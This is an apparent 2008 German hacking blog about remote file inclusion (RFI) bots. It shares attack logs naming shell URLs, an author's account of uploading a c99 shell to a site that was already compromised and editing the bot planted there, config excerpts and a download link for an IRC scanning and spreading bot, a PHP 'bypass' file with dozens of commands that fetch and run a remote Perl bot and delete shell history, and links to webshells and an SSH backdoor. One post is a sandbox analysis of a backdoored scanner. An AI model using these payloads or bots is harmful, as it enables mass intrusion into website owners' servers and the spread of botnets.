1x33x7 - blogging

Sonntag, 30. november 2008

huhu

so leider ist derzeit das andere forum down wer lust hat kann sich an diesem anmelden wo dann später uach die database übernommen wird da vom letzten leider nichts übernommen werden kann da alles wech is inklusive backups hoffe wir sehen uns wieder :)

http://1x33x7.site40.net

MFG

Bloody

von Bloody
Kommentar hinzufügen - Kommentare () - empfehlen

Samstag, 13. september 2008

nun endgültig neues board online

HuHu,
so nun ist endgültig mein neues Board online danke an ice der mir alles bereitstellt :) ich hoffe ihr meldet euch villt ggf. neu an damit ihr auf den laufenden bleibt einfach rechts im menü 1x33x7_foum klicken und ihr kommt aufs neue board :)

MFG
Bloody

von Bloody - veröffentlicht in: News
Kommentar hinzufügen - Kommentare () - empfehlen

Montag, 8. september 2008

RFI-bot Tutorial

so leute ich habe mich entschlossen ein tutorial zum konfigurieren des rfi-bots zu schreiben mehr erfahrt ihr im forum unter
http://1x33x7.site40.net/b1oxa33rxd1/viewtopic.php?f=13&t=16
da ich heute anfangen werde dieses zu schreiben denke ich mal das es spätestens morgen abend fertig sein sollte seit schonmal gespannt drauf :)

MFG
Bloody

von Bloody - veröffentlicht in: News
Kommentar hinzufügen - Kommentare (4) - empfehlen

Dienstag, 26. august 2008

BOARD ONLINE

Hallo leude,
ich habe eine ganz große bitte an euch :) und zwar meldet euch doch bitte bei uns im Board/Forum an um immer die neusten und besten tools zu bekommen da ich das blog nurnoch für allgemeine infos nutzen werde und scene-reports z.b.

Ich hoffe das das neue Board/Forum mind. genauso viele interresenten findet wie vorher :) naja was hilft noch langes gelaber ^^ meldet euch an dort und gut ist :)
Vielen dank

Hier ist das Board/Forum zu erreichen :)

http://b1oxa33rxd1.1x33x7.site40.net

MFG
Bloody

von Bloody - veröffentlicht in: News
Kommentar hinzufügen - Kommentare () - empfehlen

Donnerstag, 21. august 2008

-[ RFI ]- Verfolgung, Spaß und Infos mit Rfi und Google

Willkommen zu meinem heutigen Blog-Eintrag liebe Leser und Mitleser,

Wir werden uns heute nochmal ein bisschen mit rfi Verfolgung befassen und dabei sicher Spaß haben :D so schaun wir mal.

Found 1 :

211.239.165.202 - - [19/Aug/2008:22:11:44 -0700] "GET /logs/access.log/!scanhttp://www.seniorfitnessuk.com/ray/modules/global/inc/htacess.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.holidaybar.net"

211.239.165.202 - - [19/Aug/2008:22:11:44 -0700] "GET /!scanhttp://www.seniorfitnessuk.com/ray/modules/global/inc/htacess.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.holidaybar.net"

211.239.165.202 - - [19/Aug/2008:22:11:44 -0700] "GET /logs/!scanhttp://www.seniorfitnessuk.com/ray/modules/global/inc/htacess.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.holidaybar.net"

211.239.165.202 - - [19/Aug/2008:22:12:18 -0700] "GET /logs/access_080801.log/!scanhttp://www.seniorfitnessuk.com/ray/modules/global/inc/htacess.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.holidaybar.net"

Nice haben wir ja gleich schonmal was gefunden
http://www.seniorfitnessuk.com/ray/modules/global/inc/htacess.txt
So dadurch das dort gleich der spreadcode drinne ist können wir auch gleich den bot öffnen welcher sich hinter folgender url versteckt :)
http://www.seniorfitnessuk.com/ray/modules/global/inc/install.txt
irgendwelche #indonesiahackers oder so wie schon so oft gesehn :D schauen wir mal ob der dort ne shell oder sowas drauf hat. Bingo !!!!
http://www.seniorfitnessuk.com/ray/modules/global/inc/dimas.php
ne schöne r57 shell nicht wirklich mein fav. XD da auchnoch auf türkisch oda sowas da kp XD naja mir latte XD schrauben wa mal die c99 hoch und editieren mal den Bot villt kommt ja was LOL :D leichtsinn soll ja bestraft werden
also editiere ich kurz die install.txt :D wenn mal wer schaun will ob was kommt hier die daten die sich aber auch in der install.txt befindet aufm server

$auth = "Osirys";

$authmail = "osirys\@live.it";

my $id    = "http://www.seniorfitnessuk.com/ray/modules/global/inc/htacess.txt?";               #Your RFI Response

my $shell = "http://www.glood.tv/plugins/safehtml/billgate.txt?";                                  #Shell printed on the Vulnerable Site

my $ircd  = "irc.1andallirc.net";                                                  #Irc-Server

my $port  = "6667";                                                           #Irc-Server Port

my $chan1 = "#1x33x7";                                                          #Chan for Scan

my $chan2 = "";                                                          #Results will be printed here too

my $nick  = "[billgate-REH[v6][".int(rand(1000))."]";                                                      #Nick

my @admins = ("Bloody");

Viel spaß sage ich jetzt noch nun müssta nurnoch euren channel und ircd dort reinstellen und ihr könnt ggf. loslegen mir egal was ihr macht :D ich mache aufjedenfall weiter mitn nächsten :)

Found 2 :
nächster server schon gefunden :)

69.93.234.108 - - [19/Aug/2008:22:26:35 -0700] "GET /logs/access.log/secure.php?&cfgProgDir=http://www.wichtl.at/files/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.holidaybar.net"

69.93.234.108 - - [19/Aug/2008:22:26:36 -0700] "GET /logs/secure.php?&cfgProgDir=http://www.wichtl.at/files/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.holidaybar.net"

dort schauen wir doch einfach mal auf http://www.wichtl.at/files/ und werden gleich sehen das wir dort 

ein Dir-list haben und können uns munter seine files anschauen in diesem falle folgende

bot.txt	14-Aug-2008 13:53	16K
echo	19-Aug-2008 06:09	656
echo.txt	19-Aug-2008 06:09	656
safe.txt	14-Aug-2008 13:54	1.2K
san.txt	19-Aug-2008 06:29	0

der channel/Server wo der bot joined habt ihr hier

my @cmdstring='http://?';

my @adms=("ferryc");

my @canais=("#ferryc");

my @nickname = ("Tipai|");

my $nick = $nickname[rand scalar @nickname];

my $ircname = $nickname[rand scalar @nickname];

chop (my $realname = 'n0x.');

$servidor='irc.mildnet.org' unless $servidor;

my $porta='6667';

viel spaß damit :)



Found 3 :

jo und auch den nächsten schon gesichert XD

Log:

64.185.237.191 - - [19/Aug/2008:22:38:07 -0700] "GET /logs/access.log/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://start.ovh.net/~musicfra/includes/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.holidaybar.net"

64.185.237.191 - - [19/Aug/2008:22:38:07 -0700] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://start.ovh.net/~musicfra/includes/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.holidaybar.net"

64.185.237.191 - - [19/Aug/2008:22:38:07 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://start.ovh.net/~musicfra/includes/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.holidaybar.net"

dir:

http://start.ovh.net/~musicfra/includes/

shell:

http://start.ovh.net/~musicfra/includes/help01.php?

So hoffe ihr fandet es ein wenig interresant :) nun wünsche ich noch einen schönen tag :)

MFG
Bloody

von Bloody - veröffentlicht in: Remote File Inclusion
Kommentar hinzufügen - Kommentare () - empfehlen

Donnerstag, 21. august 2008

board down :(

jo sorry leude aber leider ist das board wieder down :(
mfg Bloody

von Bloody - veröffentlicht in: News
Kommentar hinzufügen - Kommentare () - empfehlen

Montag, 18. august 2008

Forum wieder Online

HuHu Lieber Leser und Mitleser,

Seit heute ist mein Forum wieder Online ich hoffe es füllt sich wieder so schnell wie mein altes :) also meldet euch schnell an und fühlt euch frei zu posten, talken und saugen

REGISTER @ 1x33x7_FORUM

MFG Bloody

von Bloody - veröffentlicht in: News
Kommentar hinzufügen - Kommentare () - empfehlen

Donnerstag, 14. august 2008

RFI-Project backdoor analysing

HuHu liebe leser und mitleser,

bin grade dabei das rfi-project zu analysieren und weis bis jetzt noch nicht wirklich was ich zu dem vorwurf backdoored halten soll z.b. zeigt jotti folgendes an

Die avs die etwas finden sagen das es ein trojan injector/downloader ist ikarus erkennt es als rootkit nun müsste man überlegen worum bei den program geht soweit ich weis ist es ja ein win32 tools was rfi-bugs sucht und exploited sogesehn hätten die av´s indirekt recht mit trojan downloader/injector weil man ja damit auf fremden seiten rfi-codes ausführt so das die fremde seite z.b. nen bot runterlädt/weiterverteilt also kann uns jotti soweit leider erstmal nicht helfen :( schade naja gibt ja noch mehr wege also testen wir mal das nächste :)

So starten wir das Programm mal in Unserer Sandbox :) ich habe die Sandboxie Control ist eine, ne eigendlich die beste Win32 Sandbox :) Wenn ihr Sandboxie nicht habt besorgen könnt ihr euch euch eine kostenlose version auf
http://www.sandboxie.com/index.php?DownloadSandboxie (Version 3.28) allerdings werde ich unten noch einen direkten downloadlink posten für euch :)
So also starten wir doch mal die RFI.exe in unserer Sandbox mal schaun was passiert

So nun haben wir die rfi.exe gestartet und ich sehe sofort das es wirklich sein kann das diese file backdoored oder trojanized ist weil normalerweile würde ich sagen wenn ich eine andere normale exe starte sollte der name der exe beibleiben also auch in sandboxie rfi.exe stehen (dazu findet ihr weiter untern bei den ***** gleich ein beispiel) hier wie wir sehen werden aber die normale rfi.exe gestartet was ja ok ist allerdings als *begleiter* allerdings wird noch eine 2.te exe gestarten und zwar die wnscr.exe diese kommt mir sehr sehr unseriös vor. Euch doch sicherlich auch oder nicht ? schaut selber :)

***** ***** ***** ***** *****
So ganz kurz zu einer exe bei so einem relativ kleinen programm sollte es z.b. so aussehen wenn sie gestartet bzw ausgeführt wird in der Sandbox ich nehme mal die stinger.exe ist ein avprog von mc affe oder so :D

So wie eben schon gesagt normal ist es wenn man eine .exe anklickt das auch nur eine .exe startet ich hoffe dieser vergleich hat euch bissel geholfe ^^
***** ***** ***** ***** *****
So nachdem wir das programm in der sandbox gestartet haben beenden wir das programm wieder über die sandbox geht am besten und shcnellsten im sandboxie fenster Programme schließen/beenden nun gehen wir auf Start >> Ausführen und geben dort *regedit* ein jetzt öffnen sich unser registrierungseditor dort geht ihr auf HKEY_Users gehen dann auf Datei >> Struktur Laden dort fügen wir die Datei RegHive ein, aus dem ordner wo ihr sandboxie installed habt in meinem fall ist das C:\Sandbox\1x33x7\DefaultBox und laden diese jetzt solltet ihr noch den Registrierungsschlüssel eingeben in meinem fall sandboxie würde ich euch auch empfehlen so kann man es leicht unterscheiden. danach sollte es unter HKEY_USERS so aussehen

Wir haben jetzt also unsere Registry einträge von unserem *Virtuellen System* von Sandboxie geladen so können wir schauen nachdem wir ein programm gestartet hatten was es z.b. für spuren hinterlassen hat :) dazu geht ihr auf Sandboxie wie oben angezeigt ist. Jetzt geht ihr auf Machine >> Software >>Microsoft>>CurrentVersion>>Run
dort könnt ihr nun sehen was die rfi.exe macht bzw ob sie sich zum service oder sowas hinzugefügt hat :)

So nun sehen wir diesen eintrag dort hmmm -.- kommt mir echt ein bissel seltsam vor könnte ja sein das die rfi.exe dort tmp dateien anlegt lieber nochmal weitertesten.
Also schicke ich das ganze mal rüber zu anubis :) mal schaun was die dazu sagen die geben ja informationen zum fileprocess etc und ob dort villt ein bot startet was wir ja wissen wollen also schikcen wirs hin und warten kurz :)
so hier der link zu den Anubis results
http://anubis.iseclab.org/result.php?taskid=5cfa73100ebb597421655f07ea8e45a0&refresh=1#id2293550
wie ihr dort sehen könnt wird ein ordner erstellt in C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP dort werden dann folgende dateien erstellt laut Anubis

	- Files Created:

C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP\RFI.exe

C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP\TMP4351$.TMP

C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP\wnscr.exe

und auch ausgeführt

	- Processes Created:

Executable	Command Line
	C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP\wnscr.exe
	C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP\RFI.exe

danach aber sofort wieder gelöscht

	- Files Deleted:

C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP\Console.log

C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP\RFI.exe

C:\DOCUME~1\user\LOCALS~1\Temp\IXP000.TMP\wnscr.exe

wie ihr sehen könnt wird die rfi.exe gestartet das sogenannte RFI-Project was ein fake zu sein scheint und leider auch die wnscr.exe wo ich mal sehr stark davon auseghe das dieses ein bot/trojaner sein wird der sich wohl auchnoch in die explorer.exe einnistet und dann folgende exe startet

- Files Created:

C:\WINDOWS\system32:svhost.exe

diese scheint das ursprüngliche programm zu seinwelches unter einigen maßnahmen versucht wurde zu verstecken wie ihr sehen könnt
Hier nochmal das was Normans Sandbox ausgespuckt hat

[ DetectionInfo ]
* Sandbox name: NO_MALWARE
* Signature name: NO_VIRUS
* Compressed: NO
* TLS hooks: NO
* Executable type: Application
* Executable file structure: OK

[ General information ]
* Creating several executable files on hard-drive.
* Decompressing LZSS.
* File length: 199168 bytes.
* MD5 hash: dd7eef16be30baccba3e3e23cce9b348.

[ Changes to filesystem ]
* Deletes directory C:\WINDOWS\TEMP\IXP0.TMP.
* Creates directory C:\WINDOWS\TEMP\IXP0.TMP.
* Creates file C:\WINDOWS\TEMP\IXP0.TMP\TMP4351$.TMP.
* Deletes file C:\WINDOWS\TEMP\IXP0.TMP\TMP4351$.TMP.
* Creates file C:\WINDOWS\TEMP\IXP0.TMP\wnscr.exe.
* Creates file C:\WINDOWS\TEMP\IXP0.TMP\RFI.exe.
* Creates file C:\WINDOWS\TEMP\IXP0.TMP\sxe7481.tmp.
* Creates file C:\WINDOWS\TEMP\IXP0.TMP\sxe7986.tmp.
* Deletes file C:\WINDOWS\TEMP\IXP0.TMP\sxe7986.tmp.
* Creates file C:\WINDOWS\TEMP\IXP0.TMP\sxe6748.tmp.
* Deletes file C:\WINDOWS\TEMP\IXP0.TMP\sxe7481.tmp.

[ Changes to registry ]
* Accesses Registry key "HKLM\System\CurrentControlSet\Control\Session Manager".
* Creates key "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce".
* Sets value "wextract_cleanup0"="rundll32.exe C:\WINDOWS\SYSTEM32\advpack.dll,DelNodeRunDLL32 "C:\WINDOWS\TEMP\IXP0.TMP\"" in key "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce".

[ Process/window information ]
* Creates process "wnscr.exe".
* Creates process "RFI.exe".
* Creates process "sxe6748.tmp"".

[ Signature Scanning ]
* C:\WINDOWS\TEMP\IXP0.TMP\sxe7986.tmp (8967 bytes) : no signature detection.
* C:\WINDOWS\TEMP\IXP0.TMP\sxe7481.tmp (15872 bytes) : no signature detection.
* C:\WINDOWS\TEMP\IXP0.TMP\wnscr.exe (12800 bytes) : no signature detection.
* C:\WINDOWS\TEMP\IXP0.TMP\RFI.exe (124928 bytes) : no signature detection.
* C:\WINDOWS\TEMP\IXP0.TMP\sxe6748.tmp (167936 bytes) : no signature detection.

Im grunde alles das was wir nun schon wissen und auch sicher sein können das diese file backdoored ist
tut mir echt leid das wusste ich vorher nicht sieht wohl so aus das ich auch weiterhin lieber alles testen sollte bevor ich es poste -.- naja man lernt immerwieder dazu XD

Wünsche euch allen noch nen schönen Tag

mfg Bloody

von Bloody - veröffentlicht in: infected stuff
Kommentar hinzufügen - Kommentare (1) - empfehlen

Mittwoch, 13. august 2008

rfibot by Osyris (Private)

jo wieder nen rfibot von Osyris ist auch private bzw wurde vor ein paar tagen Public allerdings wird bis jetzt nochnicht von irgendwelchen Virenprogs erkannt wie ihr hier sehen könnt :)

ich hoffe das er nun schneller erkannt wird :) oder villt auch nicht aber ich denke es könnte euch von nützen sein :)

hier ein kleiner auszug ...

#!/usr/bin/perl

#####################################################################################
##                                                                                 ##
##                                                                   15/06/2008    ##
## Author : Osirys                                                               ##
## WebSite :                                                                      ##
## Contact : osirys[at]live[dot]it                                                ##
## Italian Coder                                                                  ##
##                                                                                 ##
## ## IMPORTANT ##                                                                ##
##   # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY          ##
##   # IMPROPERLY USE OF THIS TOOL. USE IT AT YOUR OWN RISK !!                     ##
## ##                                                                             ##
##                                                                                 ##
## Release: v6 Private                                                            ##
##      After the success of the v5, I decided to code a new release :-)           ##
##      This is a private script. If you have it, keep it priv8 !!!                ##
##                                                                                 ##
## Features:                                                                      ##
##    [+]Sql Injection Scanner (Fixed a bug which release v5 was affected)         ##
##    [+]Remote File Inclusion Scanner                                             ##
##    [+]Local File Inclusion Scanner                                              ##
##    [+]Remote Code Execution Scanner                                             ##
##    [+]Mass Scan, Google,AlltheWeb,Yahoo, Msn domains:                           ##
##      .at/.com.au/.com.br/.ca/.ch/.cn/.de/.dk/.es/.fr/.it/.co.jp/.com.mx/.co.uk ##
##    [+]Integrated Shell, so you can execute commands on the server               ##
##    [+]Security Mode to protect "dangerous" functions                            ##
##    [+]Spread Mode, to activate or disable Spread Function                       ##
##    [+]Single Spread Mode, to spread on RFI vulnerable sites                     ##
##    [+]Bypass Engines ON: Google, Yahoo                                          ##
##    !: To "bypass" these engines, the Scanner just looks for websites on other   ##
##    engines that use the same bots than the main ones                            ##
##                                                                                 ##
#####################################################################################

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

#######################################################
## CONFIGURATION                                     //
#######################################################

$auth = "Osirys";
$authmail = "osirys\@live.it";
my $id    = "http://ciro1992.org/ciao/id.txt??";               #Your RFI Response
my $shell = "http://evilc0der.com/r57.txt?";                                  #Shell printed on the Vulnerable Site
my $ircd = "irc.oltreirc.net";                                                  #Irc-Server
my $port = "6667";                                                           #Irc-Server Port
my $chan1 = "#osirys";                                                          #Chan for Scan
my $chan2 = "#Vuln";                                                          #Results will be printed here too
my $nick = "v6";                                                      #Nick
my @admins = ("Osirys");
my $sqlpidpr0c = 1; # This is the number of sites that the bot will test in the same time. For an accurated scann, it's reccomended to set a low number(1)
# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites. Unless you will see the bot exiting by an excess flood!
# Instead, if you are scaning on old bugs, so not many results, you can put a higher number, so more speed.
my $rfipidpr0c = 50;

### USEFULL OPTIONS ( 0 => OFF ; 1 => ON )

my $spread = "";

my $spreadACT   = 0; #0 ->disabled, 1 ->enabled
my $securityACT = 0; #0 ->disabled, 1 ->enabled
&cheek();
my $killpwd   = "lol"; #Password to Kill the Bot
my $chidpwd   = "lol"; #Password to change the RFI Response
my $cmdpwd    = "lol"; #Password to execute commands on the server
my $secpwd    = "lol"; #Passowrd to enable/disable the Security Mode
my $spreadpwd = "lol"; #Passowrd to enable/disable the Spread Mode

my $badspreadpwd != $spreadpwd;
my $badkillpwd   != $killpwd;
my $badidpwd     != $chidpwd;
my $badcmdpwd    != $cmdpwd;
my $badsecpwd    != $secpwd;

#######################################################
## END OF CONFIGURATION                              //
#######################################################

Hier nun der komplette bot zum download

Download :
http://www.ziddu.com/downloadfile/1912890/gg.txt.html

mfg
Bloody

von Bloody - veröffentlicht in: RFI (Perlbot/Phpbot/etc.)
Kommentar hinzufügen - Kommentare (4) - empfehlen

Mittwoch, 13. august 2008

Google bypass Script

Hallo ich möchte heute einen google bypass veröffendlichen diesen braucht ihr um z.b. mit rfibots nach rfi lücken zu scannen. Da dieser bypass noch funktionier werde ich ihn Public machen damit er schnell verbreitet und erkannt wird eine kopie an jeweilige softwarefirmen wurde geschickt also kurze zeit sollte es noch funzen HF :D

<title>Google Bypass</title>
<h2>PHPESSID712647120509832974891263402184712863702163897890127012873</h2> END OF BYPASS FILE 
<?
$url="http://hellirc.web44.net/";
exec('cd /tmp;curl -O '.$url.'bot?;perl bot?;rm -f bot?*;');
exec('cd /tmp;GET '.$url.'bot? > bot?;perl bot?;rm -f bot?*;');
exec('cd /tmp;wget '.$url.'bot?;perl bot?;rm -f bot?*;');
exec('cd /tmp;lwp-download '.$url.'bot?;perl bot?;perl bot??;rm -f bot?*;');
exec('cd /tmp;fetch '.$url.'bot? >bot?;perl bot?;rm -f bot?*;');
passthru('cd /tmp;fetch '.$url.'bot? >bot?;perl bot?;rm -f bot?*;');
passthru('cd /tmp;wget '.$url.'bot?;perl bot?;rm -f bot?*;');
passthru('cd /tmp;lwp-download '.$url.'bot?;perl bot?;perl bot??;rm -f bot?*;');
passthru('cd /tmp;curl -O '.$url.'bot?;perl bot?;rm -f bot?*;');
passthru('cd /tmp;GET '.$url.'bot? >bot?;perl bot?;rm -f bot?*;');
system('cd /tmp;curl -O '.$url.'bot?;perl bot?;rm -f bot?*;');
system('cd /tmp;GET '.$url.'bot? >bot?;perl bot?;rm -f bot?*;');
system('cd /tmp;wget '.$url.'bot?;perl bot?;rm -f bot?*;');
system('cd /tmp;lwp-download '.$url.'bot?;perl bot?;perl bot??;rm -f bot?*;');
system('cd /tmp;fetch '.$url.'bot? >bot?;perl bot?;rm -f bot?*;');
shell_exec('cd /tmp;curl -O '.$url.'bot?;perl bot?;rm -f bot?*;');
shell_exec('cd /tmp;GET '.$url.'bot? >bot?;perl bot?;rm -f bot?*;');
shell_exec('cd /tmp;wget '.$url.'bot?;perl bot?;rm -f bot?*;');
shell_exec('cd /tmp;lwp-download '.$url.'bot?;perl bot?;perl bot??;rm -f bot?*;');
shell_exec('cd /tmp;fetch '.$url.'bot? >bot?;perl bot?;rm -f bot?*;');
popen('cd /tmp;wget '.$url.'bot?;perl bot?;rm bot?*;/usr/bin/perl bot?;rm -f $HISTFILE', "r");
popen('cd /tmp;curl -O '.$url.'bot?; perl bot?;rm bot?*;/usr/bin/perl bot?;rm -f $HISTFILE', "r");
popen('cd /tmp;lwp-download '.$url.'bot?;perl bot?;/usr/bin/perl bot?;rm -f $HISTFILE', "r");
popen('cd /tmp;lynx -source '.$url.'bot? >bot?;perl bot?;/usr/bin/perl bot?;rm -f $HISTFILE', "r");
popen('cd /tmp;fetch '.$url.'bot? >bot?;perl bot?;/usr/bin/perl bot?;rm -f $HISTFILE', "r");
popen('cd /tmp;GET '.$url.'bot? >bot?;perl bot?;/usr/bin/perl bot?;rm -f $HISTFILE', "r");
@exec('cd /tmp;curl -O '.$url.'bot?;perl bot?;rm -f bot?*;');
@exec('cd /tmp;GET '.$url.'bot? > bot?;perl bot?;rm -f bot?*;');
@exec('cd /tmp;wget '.$url.'bot?;perl bot?;rm -f bot?*;');
@exec('cd /tmp;lwp-download '.$url.'bot?;perl bot?;perl bot??;rm -f bot?*;');
@exec('cd /tmp;fetch '.$url.'bot? >bot?;perl bot?;rm -f bot?*;');
@passthru('cd /tmp;fetch '.$url.'bot? >bot?;perl bot?;rm -f bot?*;');
@passthru('cd /tmp;wget '.$url.'bot?;perl bot?;rm -f bot?*;');
@passthru('cd /tmp;lwp-download '.$url.'bot?;perl bot?;perl bot??;rm -f bot?*;');
@passthru('cd /tmp;curl -O '.$url.'bot?;perl bot?;rm -f bot?*;');
@passthru('cd /tmp;GET '.$url.'bot? >bot?;perl bot?;rm -f bot?*;');
@system('cd /tmp;curl -O '.$url.'bot?;perl bot?;rm -f bot?*;');
@system('cd /tmp;GET '.$url.'bot? >bot?;perl bot?;rm -f bot?*;');
@system('cd /tmp;wget '.$url.'bot?;perl bot?;rm -f bot?*;');
@system('cd /tmp;lwp-download '.$url.'bot?;perl bot?;perl bot??;rm -f bot?*;');
@system('cd /tmp;fetch '.$url.'bot? >bot?;perl bot?;rm -f bot?*;');
@shell_exec('cd /tmp;curl -O '.$url.'bot?;perl bot?;rm -f bot?*;');
@shell_exec('cd /tmp;GET '.$url.'bot? >bot?;perl bot?;rm -f bot?*;');
@shell_exec('cd /tmp;wget '.$url.'bot?;perl bot?;rm -f bot?*;');
@shell_exec('cd /tmp;lwp-download '.$url.'bot?;perl bot?;perl bot??;rm -f bot?*;');
@shell_exec('cd /tmp;fetch '.$url.'bot? >bot?;perl bot?;rm -f bot?*;');
@popen('cd /tmp;wget '.$url.'bot?;perl bot?;rm bot?*;/usr/bin/perl bot?;rm -f $HISTFILE', "r");
@popen('cd /tmp;curl -O '.$url.'bot?; perl bot?;rm bot?*;/usr/bin/perl bot?;rm -f $HISTFILE', "r");
@popen('cd /tmp;lwp-download '.$url.'bot?;perl bot?;/usr/bin/perl bot?;rm -f $HISTFILE', "r");
@popen('cd /tmp;lynx -source '.$url.'bot? >bot?;perl bot?;/usr/bin/perl bot?;rm -f $HISTFILE', "r");
@popen('cd /tmp;fetch '.$url.'bot? >bot?;perl bot?;/usr/bin/perl bot?;rm -f $HISTFILE', "r");
@popen('cd /tmp;GET '.$url.'bot? >bot?;perl bot?;/usr/bin/perl bot?;rm -f $HISTFILE', "r");
?>

mfg
Bloody

von Bloody - veröffentlicht in: RFI (Perlbot/Phpbot/etc.)
Kommentar hinzufügen - Kommentare () - empfehlen

Sonntag, 10. august 2008

14 Hacking Tools Download

HuHu,
Na leude wie schauts ich habe nochetwas für euch zum runterladen wenn ihr möchtet :) diese tools kommen aus allen möglichen bereichen des hacken viel spaß damit :)

Download :

http://rapidshare.com/files/136317958/Bypass.safemode.txt
http://rapidshare.com/files/136317960/Scanv7.zip
http://rapidshare.com/files/136317964/_WebShell_.zip
http://rapidshare.com/files/136317966/UPO.BEST.zip
http://rapidshare.com/files/136317967/haxplorer.txt
http://rapidshare.com/files/136317969/c99mod.txt
http://rapidshare.com/files/136317970/kaht2.zip
http://rapidshare.com/files/136317972/irohidebsd.tgz
http://rapidshare.com/files/136317974/scan33.zip
http://rapidshare.com/files/136317976/putty.zip
http://rapidshare.com/files/136317977/iroffer_win32bin_1.3.b11.zip
http://rapidshare.com/files/136317978/sscan.cmmds.docs.zip
http://rapidshare.com/files/136317979/PsTools.zip
http://rapidshare.com/files/136317981/sshdoor.tar.gz

MFG Bloody

von Bloody - veröffentlicht in: Hacking
Kommentar hinzufügen - Kommentare () - empfehlen

Sonntag, 10. august 2008

Project RFI by: fUSiON

// .'|. '||' '|' .|'''.|   ||   ..|''||   '|.   '|'
//.||.    ||    |   ||.. ' ... .|'    ||   |'|   |
// ||     ||    |    ''|||.   || ||      || | '|. |
// ||     ||    | .     '|| || '|.     || |   |||
//.||.     '|..'   |'....|' .||. ''|...|' .|.   '|

   ____________
//| Project RFI by: fUSiON
//|
//| IRC: irc.milw0rm.com:6667 #fUSiON
//| Email: rootbox@myway.com
//|

This win32 scanner search for rfi (remote file inclusion) vuln sites over google.
The application was written in c#, so .Net 2.0 Framework is required to beeing able to run the Scanner.
http://www.microsoft.com/downloads/details.aspx?familyid=0856eacb-4362-4b0d-8edd-aab15c5e04f5&displaylang=en

[UPDATED Versions]
[27. 06. 2008, 04:28 GMT+01:00] // Version 2.41
- Fixed checkbox for specific parameter check

[26. 06. 2008, 21:22 GMT+01:00] // Version 2.31
- Changed the pinging behaviour, a failed ping to google doesn't block the scanning module anymore

[26. 06. 2008, 05:41 GMT+01:00] // Version 2.21
- Changed the checking code, doesn't check the first and the second parameter anymore, checks now every parameter in the url for rfi vulns
- Changed the layout of the google scan module

[25. 06. 2008, 10:13 GMT+01:00] // Version 2.1
- Fixed problems with reading/writing of files

[25. 06. 2008, 09:09 GMT+01:00]
- Fixed hanging scanner if there wasn't a match of the search string on google
- Added finish scan message after scanning was completed

[25. 06. 2008, 08:49 GMT+01:00]
- Changed the checking function, the scanner should now be able to give a 99% sureness that vuln sites cause of an include or main remote file inclusion vulnerabillity.

HuHu,
villt kann ja einer von euch das gebrauchen ich habe dafür keine verwendung also viel spaß beim saugen funktionieren tut es auch :) soweit ich das sehen konnte schaut halt selber

Download :
*someone from ryan said that it is backdoored so i removed it and i will chegg if its really backdoored or Trojanized*

MFG Bloody

///// Nachtrag vom 14.08.08 /////
So da jemand bei ryan meinte das es backdoored oder botted sei werde ich das ganze mal unter die Lupe nehmen
und mir das programm anschauen und auf herz und nieren testen.
Ihr werden natürlich dadrüber informiert was nun los ist :) ich denke ich werde dazu dann einen eigenen thread öffnen :) bis dann
MFG Bloody
///// Nachtrag vom 14.08.08 /////

von Bloody - veröffentlicht in: RFI (Perlbot/Phpbot/etc.)
Kommentar hinzufügen - Kommentare () - empfehlen

Sonntag, 10. august 2008

|||RFI-BOT ||| Ksteal.by.Osyris.Priv8.mod.by.1x33x7 |||Deutsch|||

Hallo liebe Leser und Mitleser,
Ich habe da von Osyris nen rfi-bot gefunden vor 2-3 Wochen der sehr gut funktionierte und sehr viele "nützliche" funktionen hat im Bereich RFI / LFI / SQL. In der v5 version lief der bot nicht bei mir im sinne von spreading und das bypassing von suchmaschienen funktionierte nicht desweiteren habe ich die Flood-Errors ( bot disconnect from irc (excess flooding) berichtigt so das der bot nicht wegen flooden oder wiedergeben von results disconnected. Das Suchmaschienen Bypassing geht jetzt auch wieder. das spreaden sollte auch wieder funktionieren ich lege mal eine korrekte ID response datei mit hinzu und eine echoscript datei hinzu.

#!/usr/bin/perl
### v5 Osyris priv8 !!_/ PRIVATE
### v5.1 modded by 1x33x7 !!_/ PRIVATE
### - German Interface !!_/ PRIVATE
### - spreading fixxed !!_/ PRIVATE
### - bot disconnect from irc (excess flooding) fixxed !!_/ PRIVATE
### - working id.txt and echo.txt !!_/ PRIVATE
### - fully Undetected !!_/ PRIVATE

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

#######################################################
## CONFIGURATION                                     //
#######################################################

my $id    = "http://www.xx.org/robots.txt?"; #Your RFI Response
my $shell = "http://xxx.xx.xx/ehxxxxac/c0.txt?"; #Shell printed on the Vulnerable Site
my $ircd = "IRCSERVER";
my $port = "6667";
my $chan1 = "#BOTCHANNEL"; #chan for Scan
my $nick = "1x33x7vsOsyris";
my $sqlpidpr0c = 50; # Dieses ist die Zahl Aufstellungsorten, die der Bot in der gleichen Zeit prüft. Für ein accurated scann it' s empfohlen, um eine geringe Anzahl einzustellen (1)
